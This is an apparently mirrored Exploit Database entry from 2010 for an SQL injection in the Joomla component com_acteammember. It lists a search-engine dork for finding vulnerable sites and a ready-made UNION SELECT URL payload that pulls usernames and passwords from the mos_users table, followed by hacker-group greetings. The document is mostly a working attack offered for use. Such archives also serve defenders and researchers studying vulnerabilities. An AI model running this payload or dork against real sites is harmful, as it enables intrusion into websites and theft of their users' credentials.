Joomla! Component com_acteammember – SQL Injection

• Exploit Database
• 14 阅读

• 作者： ALTBTA
  日期： 2010-02-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11483/

• Joomla Component com_acteammember Sql Injection Vulnerability
  ==============================================================
  
  ####################################################################
  .:. Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
  .:. Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
  .:. Dork : inurl:"com_acteammember"
  
  ####################################################################
  
  ===[ Exploit ]===
  
  www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en
  
  
  http://server/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en
  
  
  ####################################################################
  Greats T0: aB0-3tH4b T3rR0r & RxH
  Thanks T0: AtT4CKxT3rR0r1ST